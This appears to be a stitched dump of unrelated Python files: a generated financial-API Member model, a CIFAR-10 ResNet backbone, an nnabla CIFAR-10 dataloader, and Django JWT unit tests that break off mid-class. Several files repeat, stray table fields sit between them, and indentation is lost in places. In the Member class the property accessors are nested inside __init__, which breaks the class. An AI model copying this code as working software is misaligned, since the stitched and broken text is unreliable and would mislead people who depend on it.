:param aggregated_at: The aggregated_at of this Member. # noqa: E501
:type: str
"""
self._aggregated_at = aggregated_at
@property
def connection_status(self):
"""Gets the connection_status of this Member. # noqa: E501
:return: The connection_status of this Member. # noqa: E501
:rtype: str
"""
return self._connection_status
@connection_status.setter
def connection_status(self, connection_status):
"""Sets the connection_status of this Member.
:param connection_status: The connection_status of this Member. # noqa: E501
:type: str
"""
self._connection_status = connection_status
@property
def guid(self):
"""Gets the guid of this Member. # noqa: E501
:return: The guid of this Member. # noqa: E501
:rtype: str
"""
return self._guid
@guid.setter
def guid(self, guid):
"""Sets the guid of this Member.
:param guid: The guid of this Member. # noqa: E501
:type: str
"""
self._guid = guid
@property
def identifier(self):
"""Gets the identifier of this Member. # noqa: E501
:return: The identifier of this Member. # noqa: E501
:rtype: str
"""
return self._identifier
@identifier.setter
def identifier(self, identifier):
"""Sets the identifier of this Member.
:param identifier: The identifier of this Member. # noqa: E501
:type: str
"""
self._identifier = identifier
@property
def institution_code(self):
"""Gets the institution_code of this Member. # noqa: E501
:return: The institution_code of this Member. # noqa: E501
:rtype: str
"""
return self._institution_code
@institution_code.setter
def institution_code(self, institution_code):
"""Sets the institution_code of this Member.
:param institution_code: The institution_code of this Member. # noqa: E501
:type: str
"""
self._institution_code = institution_code
@property
def is_being_aggregated(self):
"""Gets the is_being_aggregated of this Member. # noqa: E501
:return: The is_being_aggregated of this Member. # noqa: E501
:rtype: bool
"""
return self._is_being_aggregated
@is_being_aggregated.setter
def is_being_aggregated(self, is_being_aggregated):
"""Sets the is_being_aggregated of this Member.
:param is_being_aggregated: The is_being_aggregated of this Member. # noqa: E501
:type: bool
"""
self._is_being_aggregated = is_being_aggregated
@property
def metadata(self):
"""Gets the metadata of this Member. # noqa: E501
:return: The metadata of this Member. # noqa: E501
:rtype: str
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this Member.
:param metadata: The metadata of this Member. # noqa: E501
:type: str
"""
self._metadata = metadata
@property
def name(self):
"""Gets the name of this Member. # noqa: E501
:return: The name of this Member. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Member.
:param name: The name of this Member. # noqa: E501
:type: str
"""
self._name = name
@property
def status(self):
"""Gets the status of this Member. # noqa: E501
:return: The status of this Member. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Member.
:param status: The status of this Member. # noqa: E501
:type: str
"""
self._status = status
@property
def successfully_aggregated_at(self):
"""Gets the successfully_aggregated_at of this Member. # noqa: E501
:return: The successfully_aggregated_at of this Member. # noqa: E501
:rtype: str
"""
return self._successfully_aggregated_at
@successfully_aggregated_at.setter
def successfully_aggregated_at(self, successfully_aggregated_at):
"""Sets the successfully_aggregated_at of this Member.
:param successfully_aggregated_at: The successfully_aggregated_at of this Member. # noqa: E501
:type: str
"""
self._successfully_aggregated_at = successfully_aggregated_at
@property
def user_guid(self):
"""Gets the user_guid of this Member. # noqa: E501
:return: The user_guid of this Member. # noqa: E501
:rtype: str
"""
return self._user_guid
@user_guid.setter
def user_guid(self, user_guid):
"""Sets the user_guid of this Member.
:param user_guid: The user_guid of this Member. # noqa: E501
:type: str
"""
self._user_guid = user_guid
def to_dict(self):
    """Return the model's properties as a plain dict.

    Anything exposing ``to_dict`` is serialised recursively, including
    inside lists and dict values.
    """
    def _serialise(value):
        if isinstance(value, list):
            return [item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value]
        if hasattr(value, "to_dict"):
            return value.to_dict()
        if isinstance(value, dict):
            return {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                    for key, val in value.items()}
        return value

    result = {attr: _serialise(getattr(self, attr)) for attr in self.mx_types}
    # Mirror the generated-code behaviour for dict subclasses.
    if issubclass(Member, dict):
        for key, value in self.items():
            result[key] = value
    return result
def to_str(self):
"""Return the pprint-formatted string of the model's dict form."""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""Used by `print` and `pprint`; delegates to to_str()."""
return self.to_str()
def __eq__(self, other):
    """Two Member objects are equal when every attribute matches."""
    return isinstance(other, Member) and self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other | atrium/models/member.py | import pprint
import re # noqa: F401
import six
class Member(object):
"""
Attributes:
mx_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
mx_types = {
'aggregated_at': 'str',
'connection_status': 'str',
'guid': 'str',
'identifier': 'str',
'institution_code': 'str',
'is_being_aggregated': 'bool',
'metadata': 'str',
'name': 'str',
'status': 'str',
'successfully_aggregated_at': 'str',
'user_guid': 'str'
}
attribute_map = {
'aggregated_at': 'aggregated_at',
'connection_status': 'connection_status',
'guid': 'guid',
'identifier': 'identifier',
'institution_code': 'institution_code',
'is_being_aggregated': 'is_being_aggregated',
'metadata': 'metadata',
'name': 'name',
'status': 'status',
'successfully_aggregated_at': 'successfully_aggregated_at',
'user_guid': 'user_guid'
}
def __init__(self, aggregated_at=None, connection_status=None, guid=None, identifier=None, institution_code=None, is_being_aggregated=None, metadata=None, name=None, status=None, successfully_aggregated_at=None, user_guid=None):  # noqa: E501
    """Create a Member; attributes not supplied remain None."""
    # Private backing slot for every declared attribute.
    for field in self.mx_types:
        setattr(self, '_' + field, None)
    self.discriminator = None
    # Assign non-None arguments through the public property setters.
    supplied = dict(
        aggregated_at=aggregated_at,
        connection_status=connection_status,
        guid=guid,
        identifier=identifier,
        institution_code=institution_code,
        is_being_aggregated=is_being_aggregated,
        metadata=metadata,
        name=name,
        status=status,
        successfully_aggregated_at=successfully_aggregated_at,
        user_guid=user_guid,
    )
    for field, value in supplied.items():
        if value is not None:
            setattr(self, field, value)
    @property
    def aggregated_at(self):
        """Gets the aggregated_at of this Member.

        :return: The aggregated_at of this Member.
        :rtype: str
        """
        return self._aggregated_at

    @aggregated_at.setter
    def aggregated_at(self, aggregated_at):
        """Sets the aggregated_at of this Member.

        :param aggregated_at: The aggregated_at of this Member.
        :type: str
        """
        self._aggregated_at = aggregated_at

    @property
    def connection_status(self):
        """Gets the connection_status of this Member.

        :return: The connection_status of this Member.
        :rtype: str
        """
        return self._connection_status

    @connection_status.setter
    def connection_status(self, connection_status):
        """Sets the connection_status of this Member.

        :param connection_status: The connection_status of this Member.
        :type: str
        """
        self._connection_status = connection_status

    @property
    def guid(self):
        """Gets the guid of this Member.

        :return: The guid of this Member.
        :rtype: str
        """
        return self._guid

    @guid.setter
    def guid(self, guid):
        """Sets the guid of this Member.

        :param guid: The guid of this Member.
        :type: str
        """
        self._guid = guid

    @property
    def identifier(self):
        """Gets the identifier of this Member.

        :return: The identifier of this Member.
        :rtype: str
        """
        return self._identifier

    @identifier.setter
    def identifier(self, identifier):
        """Sets the identifier of this Member.

        :param identifier: The identifier of this Member.
        :type: str
        """
        self._identifier = identifier

    @property
    def institution_code(self):
        """Gets the institution_code of this Member.

        :return: The institution_code of this Member.
        :rtype: str
        """
        return self._institution_code

    @institution_code.setter
    def institution_code(self, institution_code):
        """Sets the institution_code of this Member.

        :param institution_code: The institution_code of this Member.
        :type: str
        """
        self._institution_code = institution_code

    @property
    def is_being_aggregated(self):
        """Gets the is_being_aggregated of this Member.

        :return: The is_being_aggregated of this Member.
        :rtype: bool
        """
        return self._is_being_aggregated

    @is_being_aggregated.setter
    def is_being_aggregated(self, is_being_aggregated):
        """Sets the is_being_aggregated of this Member.

        :param is_being_aggregated: The is_being_aggregated of this Member.
        :type: bool
        """
        self._is_being_aggregated = is_being_aggregated

    @property
    def metadata(self):
        """Gets the metadata of this Member.

        :return: The metadata of this Member.
        :rtype: str
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """Sets the metadata of this Member.

        :param metadata: The metadata of this Member.
        :type: str
        """
        self._metadata = metadata

    @property
    def name(self):
        """Gets the name of this Member.

        :return: The name of this Member.
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this Member.

        :param name: The name of this Member.
        :type: str
        """
        self._name = name

    @property
    def status(self):
        """Gets the status of this Member.

        :return: The status of this Member.
        :rtype: str
        """
        return self._status

    @status.setter
    def status(self, status):
        """Sets the status of this Member.

        :param status: The status of this Member.
        :type: str
        """
        self._status = status

    @property
    def successfully_aggregated_at(self):
        """Gets the successfully_aggregated_at of this Member.

        :return: The successfully_aggregated_at of this Member.
        :rtype: str
        """
        return self._successfully_aggregated_at

    @successfully_aggregated_at.setter
    def successfully_aggregated_at(self, successfully_aggregated_at):
        """Sets the successfully_aggregated_at of this Member.

        :param successfully_aggregated_at: The successfully_aggregated_at of this Member.
        :type: str
        """
        self._successfully_aggregated_at = successfully_aggregated_at

    @property
    def user_guid(self):
        """Gets the user_guid of this Member.

        :return: The user_guid of this Member.
        :rtype: str
        """
        return self._user_guid

    @user_guid.setter
    def user_guid(self, user_guid):
        """Sets the user_guid of this Member.

        :param user_guid: The user_guid of this Member.
        :type: str
        """
        self._user_guid = user_guid
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.mx_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Member, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Member):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other | 0.543106 | 0.115511 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from .resnet import BasicBlock
class ResNet_cifar10_nofc(nn.Module):
    """CIFAR-10 ResNet backbone without the final fully-connected layer.

    Produces a flat feature vector of ``64 * block.expansion`` values per
    sample; callers attach their own classifier head. The feature width is
    exposed as ``self.output_shape``.
    """

    def __init__(self, block, num_layers, num_classes=10):
        super(ResNet_cifar10_nofc, self).__init__()
        self.in_planes = 16
        # Only depths of the form 6*n + 2 are supported (20, 32, 44, ...).
        if (num_layers - 2) % 6 != 0:
            raise ValueError(
                "no experiments done on num_layers {}, you can do it yourself".format(num_layers))
        n = (num_layers - 2) // 6
        blocks_per_stage = [2 * n, 2 * n, 2 * n]
        self.conv1 = nn.Conv2d(3, 16, kernel_size=3,
                               stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(16)
        self.layer1 = self._make_layer(block, 16, blocks_per_stage[0], stride=1)
        self.layer2 = self._make_layer(block, 32, blocks_per_stage[1], stride=2)
        self.layer3 = self._make_layer(block, 64, blocks_per_stage[2], stride=2)
        # No linear head on purpose; expose the feature width instead.
        self.output_shape = [64 * block.expansion]

    def _make_layer(self, block, planes, num_blocks, stride):
        # Only the first block of a stage may downsample; the rest keep
        # stride 1. self.in_planes tracks the running channel count.
        stage = []
        for s in [stride] + [1] * (num_blocks - 1):
            stage.append(block(self.in_planes, planes, s))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*stage)

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.layer3(self.layer2(self.layer1(out)))
        # 32x32 inputs reach this point as 8x8 maps; pool them to 1x1.
        out = F.avg_pool2d(out, 8)
        return out.view(out.size(0), -1)
# Factory helpers: one headless CIFAR-10 ResNet per standard depth.
def ResNet20_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 20)
def ResNet32_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 32)
def ResNet44_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 44)
def ResNet56_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 56)
def ResNet110_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 110)
def ResNet1202_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 1202)
def test():
    # Smoke test: one dummy CIFAR-sized batch through the smallest variant.
    net = ResNet20_cifar10_nofc()
    y = net(torch.randn(1, 3, 32, 32))
    print(y.size())
# test()

import torch
import torch.nn as nn
import torch.nn.functional as F
from .resnet import BasicBlock
class ResNet_cifar10_nofc(nn.Module):
    """CIFAR-10 ResNet backbone without the final fully-connected layer.

    Produces a flat feature vector of ``64 * block.expansion`` values per
    sample; callers attach their own classifier head. The feature width is
    exposed as ``self.output_shape``.
    """

    def __init__(self, block, num_layers, num_classes=10):
        super(ResNet_cifar10_nofc, self).__init__()
        self.in_planes = 16
        # Only depths of the form 6*n + 2 are supported (20, 32, 44, ...).
        if (num_layers - 2) % 6 != 0:
            raise ValueError(
                "no experiments done on num_layers {}, you can do it yourself".format(num_layers))
        n = (num_layers - 2) // 6
        blocks_per_stage = [2 * n, 2 * n, 2 * n]
        self.conv1 = nn.Conv2d(3, 16, kernel_size=3,
                               stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(16)
        self.layer1 = self._make_layer(block, 16, blocks_per_stage[0], stride=1)
        self.layer2 = self._make_layer(block, 32, blocks_per_stage[1], stride=2)
        self.layer3 = self._make_layer(block, 64, blocks_per_stage[2], stride=2)
        # No linear head on purpose; expose the feature width instead.
        self.output_shape = [64 * block.expansion]

    def _make_layer(self, block, planes, num_blocks, stride):
        # Only the first block of a stage may downsample; the rest keep
        # stride 1. self.in_planes tracks the running channel count.
        stage = []
        for s in [stride] + [1] * (num_blocks - 1):
            stage.append(block(self.in_planes, planes, s))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*stage)

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.layer3(self.layer2(self.layer1(out)))
        # 32x32 inputs reach this point as 8x8 maps; pool them to 1x1.
        out = F.avg_pool2d(out, 8)
        return out.view(out.size(0), -1)
# Factory helpers: one headless CIFAR-10 ResNet per standard depth.
def ResNet20_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 20)
def ResNet32_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 32)
def ResNet44_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 44)
def ResNet56_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 56)
def ResNet110_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 110)
def ResNet1202_cifar10_nofc():
    return ResNet_cifar10_nofc(BasicBlock, 1202)
def test():
    # Smoke test: one dummy CIFAR-sized batch through the smallest variant.
    net = ResNet20_cifar10_nofc()
    y = net(torch.randn(1, 3, 32, 32))
    print(y.size())
# test()
import tarfile
from nnabla import random
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
import numpy as np
from sklearn.model_selection import train_test_split
from .dataloader import BaseDataLoader
from ..utils.data import transforms
def download_data(train=True):
    """Download the CIFAR-10 python archive and return (images, labels).

    Args:
        train (bool): If True, load the five ``data_batch`` members
            (50000 samples); otherwise the single ``test_batch``
            (10000 samples).

    Returns:
        Tuple of (images, labels); images shaped (N, 3, 32, 32) and
        labels shaped (N, 1).
    """
    data_uri = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
    logger.info('Getting labeled data from {}.'.format(data_uri))
    r = download(data_uri)  # file object returned
    with tarfile.open(fileobj=r, mode="r:gz") as fpin:
        if train:
            images = []
            labels = []
            for member in fpin.getmembers():
                if "data_batch" not in member.name:
                    continue
                fp = fpin.extractfile(member)
                # CIFAR batches are pickled dicts with byte-string keys,
                # hence encoding="bytes" / allow_pickle=True.
                data = np.load(fp, encoding="bytes", allow_pickle=True)
                images.append(data[b"data"])
                labels.append(data[b"labels"])
            size = 50000
            images = np.concatenate(images).reshape(size, 3, 32, 32)
            labels = np.concatenate(labels).reshape(-1, 1)
        else:
            for member in fpin.getmembers():
                if "test_batch" not in member.name:
                    continue
                fp = fpin.extractfile(member)
                data = np.load(fp, encoding="bytes", allow_pickle=True)
                images = data[b"data"].reshape(10000, 3, 32, 32)
                labels = np.array(data[b"labels"]).reshape(-1, 1)
    return (images, labels)
class CifarDataSource(DataSource):
    """nnabla DataSource serving in-memory CIFAR-10 images and labels."""

    def _get_data(self, position):
        # Indirect through the (possibly shuffled) index table.
        image = self._images[self._indexes[position]]
        label = self._labels[self._indexes[position]]
        return (image, label)

    def __init__(self, images, labels, shuffle=False, rng=None):
        """Wrap pre-loaded arrays.

        Args:
            images: Array of shape (N, 3, 32, 32) — see download_data.
            labels: Array of shape (N, 1).
            shuffle (bool): Reshuffle the index table on every reset.
            rng (numpy.random.RandomState): Source of permutations; a
                fixed-seed generator is created when omitted.
        """
        super(CifarDataSource, self).__init__(shuffle=shuffle, rng=rng)
        self._train = True
        self._images = images
        self._labels = labels
        self._size = self._labels.size
        self._variables = ('x', 'y')
        if rng is None:
            rng = np.random.RandomState(313)
        self.rng = rng
        self.reset()

    def reset(self):
        # Rebuild the lookup table; shuffling here yields a new epoch order.
        if self._shuffle:
            self._indexes = self.rng.permutation(self._size)
        else:
            self._indexes = np.arange(self._size)
        super(CifarDataSource, self).reset()

    @property
    def images(self):
        """Get a copy of the whole data, shape (N, 3, 32, 32)."""
        return self._images.copy()

    @property
    def labels(self):
        """Get copy of whole label with a shape of (N, 1)."""
        return self._labels.copy()
def get_data(train, comm, rng):
    """Download CIFAR-10 and return this process's shard of (images, labels).

    Args:
        train (bool): If True, fetch the 50k training split; otherwise the
            10k test split.
        comm: Communicator exposing ``n_procs``/``rank`` for distributed
            runs, or None for single-process use.
        rng (numpy.random.RandomState): Used to shuffle training indices;
            falls back to ``nnabla.random.prng`` when None.

    Returns:
        Tuple of (images, labels) restricted to this worker's shard.
    """
    # download the data
    images, labels = download_data(train)
    n = len(labels)
    if rng is None:
        rng = random.prng
    # Shuffle only the training split so each worker gets a random shard;
    # keep the test split ordered for reproducible evaluation.
    if train:
        index = rng.permutation(n)
    else:
        index = np.arange(n)
    # Tolerate a missing communicator (DataLoader defaults communicator=None):
    # behave as rank 0 of a single-process job instead of crashing.
    n_procs = comm.n_procs if comm is not None else 1
    rank = comm.rank if comm is not None else 0
    num = n // n_procs
    selected_idx = index[num * rank:num * (rank + 1)]
    return images[selected_idx], labels[selected_idx]
class DataLoader(BaseDataLoader):
    r"""DataLoader for cifar10.

    Args:
        batch_size (int, optional): The mini-batch size. Defaults to 1.
        searching (bool, optional): If `True`, the training data will be split into two parts.
            First part will be used for training the model parameters. The second part will be
            used to update the architecture parameters. Defaults to False.
        training (bool, optional): Whether training is `True`. Defaults to False.
        train_portion (float, optional): Portion of data is taken to use as training data. The rest
            will be used for validation. Defaults to 1.0. This is only considered when searching is `True`.
        rng (:obj:`numpy.random.RandomState`), optional): Numpy random number generator.
            Defaults to None.
        communicator (Communicator, optional): The communicator is used to support distributed
            learning. Defaults to None.
    """

    def __init__(self, batch_size=1, searching=False, training=False,
                 train_portion=1.0, rng=None, communicator=None):
        rng = rng or random.prng
        if searching:
            # Architecture search: carve the training set into a weights
            # part and an architecture part with a stratified split.
            images, labels = get_data(True, communicator, rng)
            n_train = int(len(labels) * train_portion)
            splits = train_test_split(images, labels, stratify=labels,
                                      train_size=n_train, random_state=rng)
            # train_test_split returns [X_train, X_valid, y_train, y_valid].
            part = 0 if training else 1
            X, y = splits[part], splits[part + 2]
        else:
            X, y = get_data(training, communicator, rng)
        source = CifarDataSource(X, y, shuffle=searching or training, rng=rng)
        self._data = data_iterator(source,
                                   batch_size=batch_size,
                                   rng=rng,
                                   with_memory_cache=False,
                                   with_file_cache=False)

    def __len__(self):
        return self._data.size

    def next(self):
        inputs, targets = self._data.next()
        return {"inputs": [inputs], "targets": [targets]}

    def transform(self, key='train'):
        r"""Return a transform applied to data augmentation."""
        assert key in ('train', 'valid')
        mean = (0.49139968, 0.48215827, 0.44653124)
        std = (0.24703233, 0.24348505, 0.26158768)
        scale = 1. / 255.0
        if key == 'valid':
            return transforms.Compose([
                transforms.Normalize(mean=mean, std=std, scale=scale)
            ])
        return transforms.Compose([
            transforms.Cutout(8, prob=1, seed=123),
            transforms.Normalize(mean=mean, std=std, scale=scale),
            transforms.RandomCrop((3, 32, 32), pad_width=(4, 4, 4, 4)),
            transforms.RandomHorizontalFlip()
        ])
import tarfile
from nnabla import random
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
import numpy as np
from sklearn.model_selection import train_test_split
from .dataloader import BaseDataLoader
from ..utils.data import transforms
def download_data(train=True):
    """Download the CIFAR-10 python archive and return (images, labels).

    Args:
        train (bool): If True, load the five ``data_batch`` members
            (50000 samples); otherwise the single ``test_batch``
            (10000 samples).

    Returns:
        Tuple of (images, labels); images shaped (N, 3, 32, 32) and
        labels shaped (N, 1).
    """
    data_uri = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
    logger.info('Getting labeled data from {}.'.format(data_uri))
    r = download(data_uri)  # file object returned
    with tarfile.open(fileobj=r, mode="r:gz") as fpin:
        if train:
            images = []
            labels = []
            for member in fpin.getmembers():
                if "data_batch" not in member.name:
                    continue
                fp = fpin.extractfile(member)
                # CIFAR batches are pickled dicts with byte-string keys,
                # hence encoding="bytes" / allow_pickle=True.
                data = np.load(fp, encoding="bytes", allow_pickle=True)
                images.append(data[b"data"])
                labels.append(data[b"labels"])
            size = 50000
            images = np.concatenate(images).reshape(size, 3, 32, 32)
            labels = np.concatenate(labels).reshape(-1, 1)
        else:
            for member in fpin.getmembers():
                if "test_batch" not in member.name:
                    continue
                fp = fpin.extractfile(member)
                data = np.load(fp, encoding="bytes", allow_pickle=True)
                images = data[b"data"].reshape(10000, 3, 32, 32)
                labels = np.array(data[b"labels"]).reshape(-1, 1)
    return (images, labels)
class CifarDataSource(DataSource):
    """nnabla DataSource serving in-memory CIFAR-10 images and labels."""

    def _get_data(self, position):
        # Indirect through the (possibly shuffled) index table.
        image = self._images[self._indexes[position]]
        label = self._labels[self._indexes[position]]
        return (image, label)

    def __init__(self, images, labels, shuffle=False, rng=None):
        """Wrap pre-loaded arrays.

        Args:
            images: Array of shape (N, 3, 32, 32) — see download_data.
            labels: Array of shape (N, 1).
            shuffle (bool): Reshuffle the index table on every reset.
            rng (numpy.random.RandomState): Source of permutations; a
                fixed-seed generator is created when omitted.
        """
        super(CifarDataSource, self).__init__(shuffle=shuffle, rng=rng)
        self._train = True
        self._images = images
        self._labels = labels
        self._size = self._labels.size
        self._variables = ('x', 'y')
        if rng is None:
            rng = np.random.RandomState(313)
        self.rng = rng
        self.reset()

    def reset(self):
        # Rebuild the lookup table; shuffling here yields a new epoch order.
        if self._shuffle:
            self._indexes = self.rng.permutation(self._size)
        else:
            self._indexes = np.arange(self._size)
        super(CifarDataSource, self).reset()

    @property
    def images(self):
        """Get a copy of the whole data, shape (N, 3, 32, 32)."""
        return self._images.copy()

    @property
    def labels(self):
        """Get copy of whole label with a shape of (N, 1)."""
        return self._labels.copy()
def get_data(train, comm, rng):
    """Download CIFAR-10 and return this process's shard of (images, labels).

    Args:
        train (bool): If True, fetch the 50k training split; otherwise the
            10k test split.
        comm: Communicator exposing ``n_procs``/``rank`` for distributed
            runs, or None for single-process use.
        rng (numpy.random.RandomState): Used to shuffle training indices;
            falls back to ``nnabla.random.prng`` when None.

    Returns:
        Tuple of (images, labels) restricted to this worker's shard.
    """
    # download the data
    images, labels = download_data(train)
    n = len(labels)
    if rng is None:
        rng = random.prng
    # Shuffle only the training split so each worker gets a random shard;
    # keep the test split ordered for reproducible evaluation.
    if train:
        index = rng.permutation(n)
    else:
        index = np.arange(n)
    # Tolerate a missing communicator (DataLoader defaults communicator=None):
    # behave as rank 0 of a single-process job instead of crashing.
    n_procs = comm.n_procs if comm is not None else 1
    rank = comm.rank if comm is not None else 0
    num = n // n_procs
    selected_idx = index[num * rank:num * (rank + 1)]
    return images[selected_idx], labels[selected_idx]
class DataLoader(BaseDataLoader):
    r"""DataLoader for cifar10.

    Args:
        batch_size (int, optional): The mini-batch size. Defaults to 1.
        searching (bool, optional): If `True`, the training data will be split into two parts.
            First part will be used for training the model parameters. The second part will be
            used to update the architecture parameters. Defaults to False.
        training (bool, optional): Whether training is `True`. Defaults to False.
        train_portion (float, optional): Portion of data is taken to use as training data. The rest
            will be used for validation. Defaults to 1.0. This is only considered when searching is `True`.
        rng (:obj:`numpy.random.RandomState`), optional): Numpy random number generator.
            Defaults to None.
        communicator (Communicator, optional): The communicator is used to support distributed
            learning. Defaults to None.
    """

    def __init__(self, batch_size=1, searching=False, training=False,
                 train_portion=1.0, rng=None, communicator=None):
        rng = rng or random.prng
        if searching:
            # Architecture search: carve the training set into a weights
            # part and an architecture part with a stratified split.
            images, labels = get_data(True, communicator, rng)
            n_train = int(len(labels) * train_portion)
            splits = train_test_split(images, labels, stratify=labels,
                                      train_size=n_train, random_state=rng)
            # train_test_split returns [X_train, X_valid, y_train, y_valid].
            part = 0 if training else 1
            X, y = splits[part], splits[part + 2]
        else:
            X, y = get_data(training, communicator, rng)
        source = CifarDataSource(X, y, shuffle=searching or training, rng=rng)
        self._data = data_iterator(source,
                                   batch_size=batch_size,
                                   rng=rng,
                                   with_memory_cache=False,
                                   with_file_cache=False)

    def __len__(self):
        return self._data.size

    def next(self):
        inputs, targets = self._data.next()
        return {"inputs": [inputs], "targets": [targets]}

    def transform(self, key='train'):
        r"""Return a transform applied to data augmentation."""
        assert key in ('train', 'valid')
        mean = (0.49139968, 0.48215827, 0.44653124)
        std = (0.24703233, 0.24348505, 0.26158768)
        scale = 1. / 255.0
        if key == 'valid':
            return transforms.Compose([
                transforms.Normalize(mean=mean, std=std, scale=scale)
            ])
        return transforms.Compose([
            transforms.Cutout(8, prob=1, seed=123),
            transforms.Normalize(mean=mean, std=std, scale=scale),
            transforms.RandomCrop((3, 32, 32), pad_width=(4, 4, 4, 4)),
            transforms.RandomHorizontalFlip()
        ])
import json
import base64
import jwt.exceptions
from django.test import TestCase
from rest_framework_jwt import utils
from rest_framework_jwt.compat import get_user_model
from rest_framework_jwt.settings import api_settings, DEFAULTS
User = get_user_model()
def base64url_decode(input):
    """Decode URL-safe base64 bytes, restoring any stripped '=' padding."""
    padding = -len(input) % 4
    return base64.urlsafe_b64decode(input + b'=' * padding)
class UtilsTests(TestCase):
    """Unit tests for the JWT payload/encode/decode helper handlers."""

    def setUp(self):
        # Fresh user per test; tokens are keyed off this user's username.
        self.username = 'jpueblo'
        self.email = '<EMAIL>'
        self.user = User.objects.create_user(self.username, self.email)

    def test_jwt_payload_handler(self):
        # Payload must be a dict carrying the username and an expiry claim.
        payload = utils.jwt_payload_handler(self.user)
        self.assertTrue(isinstance(payload, dict))
        self.assertEqual(payload['username'], self.username)
        self.assertTrue('exp' in payload)

    def test_jwt_encode(self):
        # Decode the token's middle (payload) segment by hand and compare.
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        payload_data = base64url_decode(token.split('.')[1].encode('utf-8'))
        payload_from_token = json.loads(payload_data.decode('utf-8'))
        self.assertEqual(payload_from_token, payload)

    def test_jwt_decode(self):
        # encode -> decode must round-trip the payload unchanged.
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        decoded_payload = utils.jwt_decode_handler(token)
        self.assertEqual(decoded_payload, payload)

    def test_jwt_response_payload(self):
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        response_data = utils.jwt_response_payload_handler(token)
        self.assertEqual(response_data, dict(token=token))

    def test_jwt_decode_verify_exp(self):
        # With expiry verification off, an already-expired token must decode.
        # NOTE(review): the setting is flipped back inline rather than in a
        # tearDown/finally, so a failure before the restore leaks the setting.
        api_settings.JWT_VERIFY_EXPIRATION = False
        payload = utils.jwt_payload_handler(self.user)
        payload['exp'] = 1
        token = utils.jwt_encode_handler(payload)
        utils.jwt_decode_handler(token)
        api_settings.JWT_VERIFY_EXPIRATION = True
class TestAudience(TestCase):
    """Tests for handling of the ``aud`` (audience) claim."""

    def setUp(self):
        # Configure the expected audience before each test.
        api_settings.JWT_AUDIENCE = 'my_aud'
        self.username = 'jpueblo'
        self.email = '<EMAIL>'
        self.user = User.objects.create_user(self.username, self.email)
        return super(TestAudience, self).setUp()

    def test_fail_audience_missing(self):
        # A token without an ``aud`` claim must be rejected.
        payload = utils.jwt_payload_handler(self.user)
        del payload['aud']
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
            utils.jwt_decode_handler(token)

    def test_fail_audience_wrong(self):
        # A token issued for a different audience must be rejected.
        payload = utils.jwt_payload_handler(self.user)
        payload['aud'] = 'my_aud2'
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.InvalidAudienceError):
            utils.jwt_decode_handler(token)

    def test_correct_audience(self):
        # A token carrying the configured audience round-trips unchanged.
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        decoded_payload = utils.jwt_decode_handler(token)
        self.assertEqual(decoded_payload, payload)

    def tearDown(self):
        # Restore the global setting so other test classes are unaffected.
        api_settings.JWT_AUDIENCE = DEFAULTS['JWT_AUDIENCE']
class TestIssuer(TestCase):
    """Tests for handling of the ``iss`` (issuer) claim."""

    def setUp(self):
        api_settings.JWT_ISSUER = 'example.com'
        self.username = 'jpueblo'
        self.email = '<EMAIL>'
        self.user = User.objects.create_user(self.username, self.email)
        return super(TestIssuer, self).setUp()

